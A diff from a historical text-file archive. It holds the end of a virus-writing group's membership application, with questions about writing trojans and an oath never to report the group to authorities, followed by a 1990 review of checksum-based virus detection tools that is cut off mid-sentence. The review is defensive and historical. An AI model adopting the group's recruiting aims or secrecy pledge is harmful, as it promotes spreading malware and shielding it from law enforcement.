Do You Crack Regularly : + Ever Made A Virus/Trojan : + Major Accomplishments : + : + +INTERVIEW +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name any or the founders of CPI? +: +: +: +: + +Have you considered the distribuition of Viruses/Trojans as a "crime"? Why +or why not? Have you ever considered the consequences that could result +from the acts of releasing a Virus/Trojan? (morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +What would you consider yourself if you were admitted into CPI, a programmer, +a phreaker, a distributor, a information gatherer, or a vegetable? +: +: +: +: + +Why would you ever want to release or aid in releasing a potential virus/trojan +to the public? +: +: +: +: + +Can you contribute to CPI? How? +:(do you have access to info concerning virus/trojans) +:(exceptional programmer?) +:(got connections?) +:(anything extraordinary?) + + +OATH +----------------------------------------------------------------------------- +Typing your name at the bottom of the following paragraph is the same as +signing your name on an official document. + +authorities - As stated in the document below, the term authorities shall + be defined as any law enforcement agency or any agency that + is/may be affiliated with any law enforcement agency. Also, + this includes any company or agency or person which is/may + be involved with the telephone company or any telephone-type + of service(s). + +I [your name here] do solemnly swear never to report neither to my peers nor +the authorities the actions and duties performed by this group, Corrupted +Programming International, on any account. Also, I realize that if I leave +CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold +the greatest confidence of CPI's activities, and I agree that any information I +may report to any one or any thing CANNOT be used against CPI and its members +in a court of law. I fully understand that if I were to become affiliated with +the authorities that it would be my duty to remove myself from any membership +if my position presented itself as contradictory towards the group, CPI and its +members. I also comprehend that if I were to be confronted by the authorities, +it my duty as a CPI member, as signed below, is to never disclose or discuss +CPI's activities to them; however, if I do, I fully agree that the information +disclosed or discussed cannot then be used against CPI or any member(s) of CPI +in a court of law. I further agree that all the terms and restrictions as noted +above also correspond to the entire group of WCCA, West Coast Corrupted +Allegiance. + +Typed:____________________ + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Upload ALL Applications To The WCCA Headquarters BBS + + T H E A N D R O M E D A S T R A I N + + Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then + \ No newline at end of file diff --git a/textfiles.com/virus/crcrevue.vir b/textfiles.com/virus/crcrevue.vir new file mode 100644 index 00000000..516ae2e7 --- /dev/null +++ b/textfiles.com/virus/crcrevue.vir @@ -0,0 +1,1575 @@ + Comparison: Products to Detect Changes to Programs + + Prepared by David J. Stang, Ph.D. + and (c) 1990, 1991 by + the National Computer Security Association + Suite 309, 4401-A Connecticut Ave NW + Washington DC 20008 + Voice: 202-364-8252 + BBS: 202-364-1304 + +This document may be freely distributed, but may not be altered +in any way. + +This is a review of some of those checksum or CRC comparison +programs. In it, I make an effort to concisely describe the +merits of this class of products, and then to help +you in selecting a product from their ranks. + +There is a difference between checksum algorithms and CRC -- +cyclic redundancy check -- algorithms. The latter usually uses a +table, and is usually a bit slower than the former. Despite the +differences, many authors seem to use the words +interchangeably, and we will continue the sloppy practice in this +chapter. + +Each file has a unique fingerprint in the form of a checksum +or CRC. Changes in any character within the file likely change +the checksum or CRC. If a file's original CRC is known -- +perhaps recorded in a file elsewhere -- and its current CRC is +known, the two values can be compared. Any difference indicates +that the file has been changed, and offers reason to investigate +further. For example, DELOUSE allows you to build a list of +critical system files that are normally subject to attack, and +check them periodically for changes. + +If a program's size is changed, it must be concluded that some +modification has occured to the file. If the size has not changed, +some modification is still possible. A file that contains the simple +message Hi Mom! could be modified so that it contained the +message Hi Dad!, and it would not show any change in size. + +A much tougher test of whether a file has been modified is to +compute the checksum or CRC cyclic redundancy check. At +this writing, there are no viruses able to modify a file without +modifying the file's CRC. Thus any checksum checker will work +just fine in catching viruses, providing that you use it to +establish checksums before a virus has modified your files. + +How is the checksum computed? Simply adding the values of all +the characters in the file is not enough, as a file containing just +"AE" would produce the same result as a file with just "EA". +Rather, the first byte of a file is read, and an algorithm applied +to it. This algorithm does something to the value of the byte, +such as rotating the bits a certain number of times, and logically +ANDING or ORING the bits to something else. The result of +that algorithm is then applied to the next byte of the file. The +process is repeated until the final byte is reached, and the +remainder is recorded. During this process, different algorithms +might be used for different portions of the code being processed. +With most procedures, a small file produces a checksum value of +the same size as a large file. + +Is there such as thing as "the" CRC value? No. The algorithm +used defines the result. There are two popular algorithms in use: +a standard CCITT CRC and a popular XMODEM CRC. Consider +COMMAND.COM for DOS 3.3 dated 2/2/88 and taking 25308 +bytes. Here are some of the checksums produced for this file by +various programs. SSCRC and Validate (method 1) use the +CCITT standard. All others in the list use some other approach. + + o BSearch, 16-bit CRC - 13369 (3439 h) + o BSearch, CRCTT - 10994 (2AC0 h) + o CHKSUM - 20011 (4E2B h) + o CRCDOS - 59676 (E91C h) + o Delouse, method 1 - 1073916 (1062FC h) + o Delouse, method 2 - 1067428 (1049A4 h) + o Delouse, method 3 - 1048666 (10005A h) + o The Detective, CRC 1 - 26939 (693B h) + o The Detective, CRC 2 - 54914 (D682 h) + o Module Integrity Check - 24922 (615A) + o SSCRC - 52167 (CBC7 h) + o Validate, method 1 - 52167 (CBC7 h) + o Validate, method 2 - 4024 (0FB8 h) + o VCheck - 2141344 (0020ACA0 h) + + + + WHY DETECT CHANGES? + + + +There are several good reasons. + + o Viruses have great difficulty infecting your machine + without making some change in it. To detect a change + is to begin the process of detecting a virus. Although + some are concerned that a change-detecting program + cannot prove there isn't already a virus in your + computer, the fact is that you needn't worry about this. + If you infect your computer with a dozen viruses, then + measure its state, one of these viruses will change that + state in the next hour or so; a remeasurement + establishes that something is afoot. + + o Occasionally things go wrong with computer hardware + and software. You run CHKDSK and discover a + number of lost clusters in a number of lost chains. You + scrap these clusters, but wonder what files you've lost. + A proper change-detection program will give you a list + of files deleted since your last run. You can then + restore them from your backups. + + o In many organizations, we only want to permit the use + of "authorized software." Using a proper + change-detection program, you can establish what + software was added to the machine since your last run. + Any "extra" software will quickly come to your + attention. + + + + CAN A VIRUS BEAT THE SYSTEM? + + +The answer may be yes. You need to know how, so it doesn't +happen to you. The defeat can come at the hands of a +CRC-aware virus (none exists yet) or at the hands of a stealth +virus (there are several now). + + + + CRC-AWARE VIRUSES + + +In theory, a virus could be written that would compute a file's +CRC, add itself to the file, then replace additional characters +from the file until the new CRC was the same as the old one. +Such a virus would escape the attention of many checksum +checkers. + +Programs could catch such a virus by using an incremental +cyclic redundancy check approach. In this approach, files are +dissected into randomly-sized blocks of data, using dynamic +block size allocations that allow files as small as one byte to be +accurately checked. CHECKUP uses this approach. It scans and +compares every byte of the target files on a block-by-block basis. +If the recorded file sizes, any of the block CRC comparisons, or +the CRC totals do not match, CHECKUP alerts users that the +target files have been altered. + +Another approach to the problem is to compute the check in two +different ways. For example, if both a checksum and a file size +were to be calculated and recorded for later comparison, it is +unlikely that a virus could be modified without mismatching on +one of the comparisons. Or if checksums were to be calculated +using two different algorithms, the virus would again likely fail +to fool both techniques. + +Thus if some future virus were to compute checksums prior to +infections, pad their viral code with characters that maintain +checksum integrity and then infect, CHECKUP could catch it. + + + + STEALTH VIRUSES + + +A stealth virus is able to defeat a checksum program if it loads +into memory before the checksum program runs. The stealth +virus can then detect the checksum program as it attempts to +read each program on the disk, and before letting the checksum +program see the file it is trying to read, extracting the virus +from it. After the checksum program is satisfied that there is no +virus in the file, the virus in memory can re-insert it into the +file just checked. + +Such a problem can be easily avoided: simply boot the system +from an uninfected floppy, then run your checksum program +from it. + +In the tables presented here, space has been provided for you to +rate an additional product. + + + + PRODUCT COMPARISONS + + + + + EASE OF USE + + +Conducting these evaluations was not easy. In the table below, I +record my joy or frustration in trying to master the program. + + Alert + + This program makes claims of ease of use, with a + pop-up, drop-down menus, mouse support, nifty sound + effects, and the like. But the blinking text on the + screen will certainly drive you crazy, if you are still + sane after waiting, Alert would like to run McAfee's + scan every time you add a file to the list it will check; + it doesn't accept wild cards, so if you thought you + would do a checksum on all of your files, assume that + you won't be able to install it in less than a week. + Installation and simple evaluation took 53 minutes. + + The Antibody Test + + Antibody's installation is extremely easy, if it works. + You cannot simply copy the files to your hard disk -- + you must let Antibody do it for you. In the process, + Antibody wants to check the integrity of your + distribution disk. If you have any alien file on this + disk, Antibody will abort after 3 or 4 minutes of + self-examination. Beat the system by clearing the + read-only and hidden attributes of SIGNATURE.DAT, + then rename it. Antibody will create a new file for you + and proceed. The manual includes a comprehensive list + of error messages and their meanings. + + BSearch + + No installation required! Copy BSEARCH.EXE to + anywhere on your hard disk, and run it with the + obvious wildcards. For example, BSEARCH C:\*.* will + examine everything. + + CHKSUM + + Simply copy to anywhere on your hard disk and enter + "CHKSUM". You'll be prompted for what you should + have entered. + + Checkup + + The most difficult of all the packages reviewed here. + Documentation spans five files, and numbers almost + 100 pages. With such a mass of instructions, you are + unlikely to have any success in installing the program. + The verbosity extends to the log file, which you can + create to record any file mismatches. The log file for a + single run on 183 files was 270K - nearly 2K per file. + Should you try to use the product on a large hard disk, + your log would be worthless. + + CRCDOS + + As with CHKSUM, simply copy to anywhere and go! + Instructions will appear on the screen if you simply + enter "CRCDOS." + + Delouse + + It took just four minutes to completely understand how + Delouse works and to begin building the file of CRC + values. Installation is nothing more than copying a few + files to anywhere on your hard disk. Delouse can also + be run from a floppy. + + The Detective + + Copy and go. When first run, the program pops up a + simple menu that works very well. You'll be asked + what drives to process and what file extensions to + check. Entering * will process everything. You'll be + asked if you also wish to scan for viruses (meaning to + compute CRCs) as you produce the file list for + subsequent checks. Also, The Detective keeps itself + up-to-date with each run. On every run, the most + recent signatures are copied to the "old" list, and new + signatures are computed for comparison. + + F-Prot + + Copy F-OSCHK to any location on your hard disk and + enter F-OSCHK. It will display five numbers which are + encrypted checksums of the partition table, boot record, + and three operating system files. AUTOEXEC.BAT can + then be given a line beginning with (path) F-OSCHK + and followed by these five values. + + FICHECK + + Seemingly easy to use. Can be run from a menu or as a + command line in a batch file. However documentation + for the command line operation is poor, and misleading. + + Module Integrity Check + + Copy the file MIC to anywhere on your hard disk and + enter MIC. There are no menus, nothing to select. + You'll create a list of CRCs, if none exists, in your root. + If one exists, it will be renamed "OLD", and another + will be created. The two will be automatically + compared. You'll be notified of any changes, any added + files, and any deleted files. You'll also be notified if + nothing has changed. All information is automatically + sent to reports in the root. Nothing could be simpler. + + Novirus + + Copy the program to anywhere on your hard disk, and + it makes a hidden file in the root containing what it + claims is encrypted CRC, file date, time, and size + information for each of the three system files. + Installation and use are very easy. + + SSCRC + + Very easy. Copy the file to your hard disk, and run the + program. Onscreen instructions tell you to enter /F to + create the File of CRCs or /C to Check files against + these CRCs. Requires ANSI.SYS + + Validate + + Very easy to use for finding the CRC of a single file. + Simply copy VALIDATE to your drive, and run it. + Impossible to use for checking the CRCs of all files, as + it does not work with a list, does not accept wildcards, + and will not compare current CRC with stored CRC. + + VCheck + + Fairly straightforward. You may need to follow the + example in the manual to guess the spacing required + for parameters in the command line. Results are + displayed on your screen, and you'll need to press a key + to continue scanning, after the screen fills. This + ensures you'll spot a surprise change in a file, but + doesn't deliver the kind of power that suits it for a + batch file. Not menu-driven. + + VirusGuard + + Simply type INSTALL. VirusGuard will install itself on + your hard disk and scan all COM and EXE files for + their signatures. It will also modify your + AUTOEXEC.BAT to automatically invoke RAMWATCH + on subsequent boots. Our copy of the program did not + come with documentation, however, so we are a bit + limited in our review here. + + + + NUMBER OF TECHNIQUES + + + +The program should compute checksums using two different +approaches, or compute both file size and checksum, to ensure +that a virus doesn't modify a file in such a way that the +checksum isn't changed. Gilmore Systems has a program called +PROVECRC that creates a modified version of a file that is +different, but that has the same CRC as the original. The +program proves that a single CRC is not fool-proof for virus +detection, for it is possible to write a virus -- much like they +wrote PROVECRC -- which can add code to your programs +without changing the CRC. When two algorithms are used, +PROVECRC creates changes undetected by one, but detected by +the other. + + Alert + + Alert uses different algorithms on different portions of + each file. A file records the results of these algorithms + in encrypted form in a file which covers all of a group + of files you wish to check. It is very unlikely that any + virus author would have the interest or patience to + break the scheme. + + The Antibody Test + + Antibody lists all files added or deleted since the last + comparison, as well as showing any changes in size, + date, time, or attributes. + + BSearch + + Stores filenames (with paths), file sizes, 16-bit and + 32-bit checksums in an indexed databases. Uses a + binary tree indexed database structure to store the files + quickly and allow even quicker searches and updates. + + CHKSUM + + Uses a single 16-bit checksum approach. + + Checkup + + Offers three different options for calculation: + table-driven incremental CRC, cumulative CRC, and + cumulative checksum. + + CRCDOS + + Uses a single 16-bit checksum approach. + + Delouse + + Uses three different checksum algorithms. All are + simple, but slightly different in the way they calculate + the checksum. One of these algorithms is chosen at + random when Delouse starts, and the method number + is recorded in a data file. You can force Delouse to + choose one of the three methods if you wish. + + The Detective + + Uses two different 16-bit CRC algorithms. + + F-Prot + + F-OSCHK uses just one algorithm. + + FICHECK + + FICHECK uses one 16-bit algorithm, MFICHECK uses + another. Both are bundled in the same package. + + Module Integrity Check + + Uses one 16-bit algorithm. + + Novirus + + Appears from testing that Novirus uses no checksum or + CRC algorithm, despite the claims of its + documentation. Using a sector editor, for instance, the + word "Microsoft" was changed to "Machosoft" in + COMMAND.COM. Novirus was unable to recognize + this. I changed the attributes of the hidden system + files, and again Novirus failed to detect the change. I + renamed COMMAND.COM, infected it with Jerusalem, + and renamed it to COMMAND.COM. Novirus + recognized the change, but only because of the + increased file size. When I used NU to reduce the size + of the infected file to its original size, as listed in the + root directory, Novirus did not recognize it as a + problem. It appears that no checksumming is done, + although this is claimed in the documentation. Checks + on file existence, date, size, and time do appear to be + done. For instance, I booted, deleted COMMAND.COM, + and ran Novirus. Novirus halted the system. It also + halted the system when I used NU to increase the size + of COMMAND.COM to 999999999. + + SSCRC + + Uses one 16-bit CCITT CRC algorithm. + + Validate + + Uses two 16-bit algorithms, one of which is CCITT + CRC. + + VCheck + + Uses one 32-bit algorithm. + + VirusGuard + + Appears to use one algorithm. CRCs are encrypted. + + + + SCANNING OF CRITICAL SYSTEM FILES + + + +On an MS-DOS hard disk, there are five critical system files +that are read during the boot process: the partition table, the +boot record, two hidden system files, and COMMAND.COM. +Because many viruses take up residence in the partition table, +boot record, or COMMAND.COM, it may be desirable to check +these files on each boot. Not all CRC programs, however, can +check all of these files. Two points are awarded for each file it +can check. Note that viruses rarely touch the two hidden system +files, and many do not touch COMMAND.COM Quite a few, +however, get into the partition table of the hard disk or boot +record of floppies. + + Alert + + Alert cannot examine the partition table or boot record. + It can check the other three files. + + The Antibody Test + + Antibody does not check the partition table. It does + check the other four files automatically, however. + + BSearch + + Does not scan partition table or boot record. + + CHKSUM + + Does not scan partition table or boot record. + + Checkup + + Does not scan partition table or boot record. + + CRCDOS + + Does not scan partition table or boot record. + + Delouse + + Does not scan partition table or boot record. + + The Detective + + Does not scan partition table or boot record. Further, + the evaluation version (reviewed here) will not examine + anything in the root, which is certainly the two hidden + system files and likely COMMAND.COM. + + F-Prot + + F-OSCHK scans all five files. + + FICHECK + + Automatically checks the CRC of the partition table + and the boot record, and logs this along with available + disk space and FAT ID byte. For all files checked, logs + date, time, size, attributes, and CRC, and reports any + discrepancies. Checking of hidden system files, + COMMAND.COM, etc. is at user discretion. + + Module Integrity Check + + Does not scan partition table or boot record. + + Novirus + + Does not scan partition table or boot record. + + SSCRC + + Does not scan partition table or boot record. + + Validate + + Does not scan partition table or boot record. + + VCheck + + Does not scan partition table or boot record. + + VirusGuard + + Does not scan partition table or boot record. + + + + COMPLEXITY OF CHECKING ALGORITHM + + + +A 32-bit CRC is potentially harder for a virus to beat than a +32-bit CRC; a pair of calculations is harder than a single +calculation. In this table, 10 points are awarded for the use of a +32-bit CRC or two 16-bit CRCs; 5 points for a single 16-bit CRC; +0 for no CRC. + + Alert + + Algorithm is not discussed in the documentation. + However, the encrypted CRC for just one file is 748 + bytes - about 5% of the checked file's length. This + suggests that the algorithm is essentially unbreakable. + + The Antibody Test + + Algorithm is not discussed in the documentation. + However, the encrypted CRC for just each file is 128 + bytes. This suggests that the algorithm is essentially + unbreakable. + + BSearch + + Performs both 16-bit and 32-bit checksums. + + CHKSUM + + Performs CRC-16 -- 16 bit cyclic redundancy check. + + Checkup + + Performs CRC-16 -- 16 bit cyclic redundancy check. + Results are encrypted. + + CRCDOS + + Performs CRC-16 -- 16 bit cyclic redundancy check. + + Delouse + + Performs CRC-16 -- 16 bit cyclic redundancy check. + + The Detective + + Performs both 16-bit and 32-bit cyclic redundancy + checks. + + F-Prot + + Not described in documentation. Encrypts recorded + checksums. Uses only one algorithm. + + FICHECK + + Computes CRC with FICHECK, modified CRC with + MFICHECK. You can run both, if you wish, to defeat + any imaginary virus that is able to defeat one of these + approaches. + + Module Integrity Check + + Computes a checksum on part of the file. Uses only one + algorithm. + + Novirus + + Does not appear to do any CRC/checksum computation. + + SSCRC + + Uses only one algorithm -- a 16-bit CCITT standard + CRC. + + Validate + + Uses two 16-bit algorithms, one of which is CCITT + CRC. + + VCheck + + Uses one 32-bit algorithm. + + VirusGuard + + Unknown. + + + + SPEED WHEN CHECKING ALL FILES + + + +From time to time, it may be desirable to check all files on the +hard disk for changes. However, if this process takes a long +time, users will not do it as often as they should. What is the +speed of checking files? + +For our tests, we did CRC calculations on a 20Mb hard disk in a +12Mhz XT. The XT had a Norton SI of 1.8 for its computing +index, and 1.4 for its disk index, an overall performance index of +1.6 that of an IBM XT. It had a total of 2.3 Mb in 134 files in 19 +directories. In each case, the checksum program was run from a +floppy. Timing was done with a shareware program called +TIMER. Numbers reported here are per file. Since it is not the +number of files, but the number of bytes, that determines the +overall speed of operation, your times will vary if your files are +larger or smaller, on average, than those in the test suite. Our +average file was 18,651 bytes. So to say that scanning files took +about 2 seconds a piece is to say that the program could scan +9,325 bytes per second. A 20 Mb hard disk, full to the brim, +would take such a program 37 minutes to scan fully. If you +restricted the program to COM, EXE, OVL, BIN, SYS, and other +executable files (an intelligent restriction), you might cut this +time in half or more. + + Alert + + I could not imagine waiting while Alert checked all + files on the hard disk. Scanning just one file took 13.5 + seconds. Checking the 2.3 Mb on the test hard disk + would have taken about 17.5 minutes. This is + unacceptable. + + The Antibody Test + + Antibody is slow, but not as slow as some of the others + tested here. It took 6 minutes, 14 seconds to scan all + programs on the hard disk -- 71 files, about 5 seconds a + piece. + + BSearch + + Building the initial database of all files -- including + manuals and other files -- took BSearch 10 minutes, 35 + seconds -- about 4.7 seconds each. Then scanning + against this file took 10 minutes, 20 seconds -- about + 4.6 seconds each. + + CHKSUM + + To compare the three DOS files with CRCs previously + computed took 5.6 seconds, about 1.9 seconds each. + Testing everything in the root took 13 seconds for 8 + files, about 1.6 seconds each. + + Checkup + + To build a list of CRCs for 183 files took 9 minutes, 16 + seconds, about 3 seconds each. It took 8 minutes, 35 + seconds to use the author's proprietary "enhanced" + CRCs, about 2.8 seconds each. Using the checksum + approach took about 2.8 seconds each. + + CRCDOS + + To build a list of CRCs for 146 files, CRCDOS took 6 + minutes 27 seconds, about 2.6 seconds each. Testing + everything on this list took 6 minutes, 24 seconds, + again about 2.6 seconds each. + + Delouse + + To build a list of CRCs for 146 files, Delouse took 2 + minutes 38 seconds, about 1.1 seconds each. Testing + everything on this list took 2 minutes, 35 seconds, + again about 1.1 seconds each. + + The Detective + + To build a list of CRCs for 146 files, The Detective took + 3 minutes 57 seconds, about 1.6 seconds each. Testing + everything on this list took exactly the same length of + time. + + F-Prot + + Scans five system files in 10.0 seconds, 2 seconds per + file. However, F-OSCHK cannot be made to calculate + checksums on any files but these. + + FICHECK + + To build a list of CRCs for 146 files, FICHECK took 5 + minutes 27 seconds, about 2.2 seconds each. Testing + everything on this list took 5 minutes, 24 seconds, + again about 2.2 seconds each. + + Module Integrity Check + + To build a list of CRCs for 146 files, MIC took only 1 + minute 30 seconds, about .6 seconds each! Testing + everything on this list took the same length of time. + The program achieves this blazing speed by performing + a checksum only on the parts of the file that a virus is + likely to infect: the top and the bottom. + + Novirus + + Scans three system files in 1.54 seconds, .5 seconds per + file. However, cannot be made to check any files but + these, and does not appear to calculate checksums. + + SSCRC + + To build a list of CRCs for 146 files, SSCRC took 6 + minutes 27 seconds, about 2.6 seconds each. Testing + everything on this list took 6 minutes, 10 seconds, + about 2.5 seconds each. + + Validate + + To validate a selected file requires issuing the validate + command for that file, then looking the result up + on-line, from a BBS in California. Minimum time + required: perhaps 3 minutes per file. + + VCheck + + To build a list of CRCs for 87 COM and EXE files, + VCheck took 1 minute 55 seconds, about 1.3 seconds + each. Testing everything on this list took 1 minutes, 25 + seconds, about 1 second each. + + VirusGuard + + To build a list of CRCs for 87 COM and EXE files, + VirusGuard took 1 minute 39 seconds, about 1.2 + seconds each. Testing everything on this list took 1 + minute, 42 seconds, again about 1.2 seconds each. + + + + EFFICIENCY IN CHECKING ALL FILES + + + +Does the program permit checking of all files with some option +such as "/ALL", or is it necessary to feed the program a list of +all the files you wish checked? The latter approach can be +grueling for any user with a large hard disk! Is there an upper +limit to the number of files that can be checked? Is the program +smart enough to check other logical drives, such as D:? + + Alert + + No. There does not seem to be any such efficiency + possible. The programwants to scan one file at a time, + and add one at a time to its list. Alert can only manage + a list of about 200 files. Alert does not know that + viruses do not inhabit documentation, and is likely to + begin by scanning its own manual! Creating a list to be + checked is very labor-intensive. + + The Antibody Test + + Antibody automatically scans the entire hard disk upon + installation. It can manage about 3900 file signatures. + Antibody ignores drives D:, E:, etc., however. + + BSearch + + There is no upper limit to the number of files that can + be checked. Ignores D:, E:. As with Antibody, BSearch + can be called from a batch file that scans specified + drives, directories. Output showing changes can be + routed to the printer, if this is desired. + + CHKSUM + + Power is about equivalent to BSearch. You can do + almost anything with batch files, but you will need to + be a bit handy with an ASCII editor to do so. You'll + need to specify if you want CHKSUM to look at D: for + you. There is no limit on the number of files that can + be checked. Unlike BSearch, CHKSUM will not look at + subdirectories of the specified target, unless you tell it + to. + + Checkup + + Checkup simply processes everything on your hard + disk, and does not work from any input list. There is + no upper limit on the number of files that can be + scanned, other than your patience. Checkup is happy to + point out that files have been changed, when they + haven't been. This occurs because Checkup creates one + X.XUP for every file beginning with X. Thus the + signature for X.BAT is stored in X.XUPand the + signatures for X.COM, X.SYS, X.BAK, etc. are + compared with the contents of this file. With perhaps + 10% of such "claims" wrong, you will lose patience with + it quickly. Checkup gets a 10 for efficiency, a 0 for + accuracy. + + CRCDOS + + CRCDOS will process an ASCII list of files you give it, + a list you can create by entering CHKDSK *.* /v >> + filelist You can then feed CRCDOS this list with a + command such as CRCDOS -m crclist filelist. There is + no upper limit on the number of files that can be + scanned. D: and other drives are ignored unless + CRCDOS is told to work them over. Like CHKSUM, + CRCDOS will not automatically look at subdirectories + of the specified target, unless you tell it to. + + Delouse + + Much like CRCDOS. Delouse will process an ASCII list + of files you give it, a list you can create by + entering CHKDSK *.* /v >> delouse.dat You can then + feed Delouse this list with a command such as + DELOUSE MAKE. This creates a file DELOUSE.CHK + file, used during checking. To check, you enter + DELOUSE CHECK. There is no upper limit on the + number of files that can be scanned. D: and other + drives are ignored unless Delouse is told to work them + over. Like CHKSUM and CRCDOS, Delouse will not + automatically look at subdirectories of the specified + target, unless you tell it to. + + The Detective + + Intelligent menu-driven design. Prompts for drives, file + extensions. It is easier (and more sensible) to make it + simply check everything than to be selective. + + F-Prot + + Very efficient, but scans only the five system files. + + FICHECK + + Intelligent menu-driven design. Prompts for drives, file + extensions. It is easier (and more sensible) to make it + simply check everything than to be selective. Some + selectivity (with *.COM, *.EXE, etc.) is easy; other + selectivity (specific files) is harder to do. + + Module Integrity Check + + Checks all files automatically. Processes only the + current logical drive. Cannot be made to scan + selectively. Creates all reports, as disk files, + automatically. Because it is so fast, we award nearly + full points here. + + Novirus + + Cannot be made to check multiple drives. Cannot be + made to check files other than the three system files. + + SSCRC + + There is no upper limit to the number of files that can + be checked. Ignores D:, E:. As with Antibody and + BSearch, can be called from a batch file that scans + specified drives, directories. Output showing changes + can be routed to the printer, if this is desired. + + Validate + + No. There does not seem to be any efficiency possible. + The programwants to scan one file at a time, and is + unable to compare its results with anything in a list of + recorded checksums. + + VCheck + + Checks all COM and EXE files automatically. Processes + whatever logical drive you specify on the command line. + Cannot be made to scan selectively. Cannot be made to + scan SYS, BIN, OVL, or other files that might become + infected. Creates all reports, as disk files, + automatically. + + VirusGuard + + Checks all COM and EXE files automatically. Processes + whatever logical drive you specify on the command line. + Cannot be made to scan selectively. Cannot be made to + scan SYS, BIN, OVL, or other files that might become + infected. If a file is changed, the machine pauses + during signature checking, with the message "X.X has + been modified. Press F1 to acknowledge." + + + + USER CONTROL OF FILES TO BE CHECKED + + + +Because checking all files can take some time, users may wish to +provide the program with a list of files to be checked. Can this +be done? Can the user use their text editor or other convenient +tool to build the file list? + + Alert + + Yes. Users select those files they wish to check, via + menu. The menu system can be used to build a file list + for subsequent use. The file list is encrypted and not + editable with any program other than Alert, however. + + The Antibody Test + + No. Antibody cannot be given a short list. You may add + to its understanding of what should be checked, but + cannot subtract. + + BSearch + + You can only list by file type and directory. Thus you + can specify all COM files within each of 4 directories, + all EXEs within another 2 directories, etc. Each + instruction is offered on a separate command line, and + can be run from a batch file. The database cannot be + edited with most word processing programs, however. + + CHKSUM + + Building the list of files to check can be done easily by + redirecting the program's output (">>") to a file, then + editing this file into a batch file. + + Checkup + + No control. + + CRCDOS + + Extremely easy to use here. Hand CRCDOS a list of + files, and it builds a list of CRCs for those files. Hand + it this list, and it compares current and stored CRCs + for changes. + + Delouse + + A bit easier than CRCDOS, even, in that file names to + scan and to compare are hard-coded, so the command + line is simpler: you only need to enter "Delouse Make" + or "Delouse Check" + + The Detective + + The user controls the drive(s) to check, and the file + extensions to check, but cannot control the directories + to check or provide a list of specific files. + + F-Prot + + The user can choose to not check any of the five system + files. But the user cannot get F-OSCHK to scan any + other files than these. + + FICHECK + + The user controls the drive(s) to check, and the file + extensions to check, but cannot control the directories + to check or provide a list of specific files. + + Module Integrity Check + + MIC is so fast that it doesn't make any sense to + attempt to force it to scan selectively. Let it scan + everything. You're done. MIC is certainly the easiest to + use, most efficient of all the programs described in this + chapter. + + Novirus + + Offers no control over the checking process. Takes only + one command line - /I makes it start over with a new + database of information on the three files. + + SSCRC + + Offers no control over the checking process other than + permitting scan of a directory, rather than the entire + drive. + + Validate + + You can make it scan any file in any directory. But + scanning two files requires two commands. Not + practical for real-life. + + VCheck + + Offers no control over the checking process other than + permitting scan of a directory, rather than the entire + drive. + + VirusGuard + + VirusGuard is so fast that it doesn't make any sense to + attempt to force it to scan selectively. Let it scan + everything. You're done. MIC is certainly the easiest to + use, most efficient of all the programs described in this + chapter. + + + + ADDING SELF-CHECKING TO FILES + + + +The most efficient approach to checking files is not to check only +critical files, or all files, but rather to check files as they are +run. This checking can be done with either code which is added +to each file, or with a memory-resident driver, that monitors file +access. + +Adding code to a file is the idea of "vaccination." The file is +modified so that when it is run, control is first passed to the +appended code, which then calculates the checksum of the file +with the checksum that was stored in that file at the time of +vaccination. A failed comparison can result in an alert to the +user. + +There are a few drawbacks to the approach. It slows processing +a small amount, it enlarges each file a small amount, it may not +work on COM files that are nearly 64K in size, since 64K is the +largest size supported by the COM format; it cannot work with +BIN, SYS, and OVL files; it cannot work with archived, +self-extracting EXE files, and so on. While some authorities, +such as Rich Levin, view such approaches as substantially +flawed, we are unconvinced. + + Alert + + This feature is not offered. + + The Antibody Test + + This feature is not offered. + + BSearch + + This feature is not offered. + + CHKSUM + + This feature is not offered. + + Checkup + + This feature is not offered. + + CRCDOS + + This feature is not offered. + + Delouse + + This feature is not offered. + + The Detective + + This feature is not offered. + + F-Prot + + The F-Prot package includes F-XLOCK, a program that + can make any other COM or EXE self-checking. + Entering F-XLOCK *.* will protect all COM and EXE + files in the current directory. When infected, the + program will hang the system and report "THIS + PROGRAM HAS BEEN INFECTED!" and the system + hangs. + + FICHECK + + This feature is not offered. + + Module Integrity Check + + This feature is not offered. + + Novirus + + This feature is not offered. + + SSCRC + + This feature is not offered. + + Validate + + This feature is not offered. + + VCheck + + This feature is not offered. + + VirusGuard + + This feature is not offered. + + + + OPTIONAL SYSTEM LOCKUP ON DETECTION OF +MODIFICATION + + + +Many things can modify a program: a virus, a hacker, an error +in using a sector editor. If a program has been modified, do you +want to try to run it? The smart money says no, let's stop right +now and see what has happened here. Running any program +that contains a virus is certain to spread the virus. It might be +desirable if the system is able to prevent any modified program +from running. + + Alert + + You are given ample warning about what files have + been modified. The warning is both auditory and + visual, and the screen requires you to press a key after + reading what has happened. The warning may not be + accurate, however. I swapped the names of two test + files, and Alert was unable to find one, told me the + other was the wrong size. Both, in fact, were where + they had been, but were completely modified. Further, + the warning on the screen tells the user to consult the + manual, rather than telling the user what to do next. + + The Antibody Test + + The log shows what has changed, and how. Optionally, + you may ask the program to display any text in any + file which has been changed since the last check. + However, there is no system lockup if a modification is + detected, nor are there any audible warnings. + + BSearch + + The log shows what has changed, and how. There is no + system lockup if a modification is detected. A faint beep + can be heard when any change is detected. + + CHKSUM + + Upon detecting a changed file, CHKSUM beeps and + displays a message. But it doesn't pause in its labors, + and the result of a massive infection is likely to go + scrolling off the screen. No lockup takes place on + mismatches. + + Checkup + + The documentation indicates that the system can be set + to lockup upon detection of a mismatch. We were not + able to create this effect on our test machine, however. + Further, although the documentation claims to permit + production of a log file, we were not able to do this. + Our copy was downloaded from the author's BBS. + + CRCDOS + + There is an extensive screen message whenever a + change is detected, but the system does not beep. No + lockup takes place on mismatches, either. + + Delouse + + There is a modest screen message whenever a change + is detected, but the system does not beep. No lockup + takes place on mismatches, either. + + The Detective + + You won't get a beep or message on the screen. A + report, sent to disk or your printer, lists the files that + have been added, deleted, or changed since the last run + of The Detective. Far too subtle for most users. + + F-Prot + + If 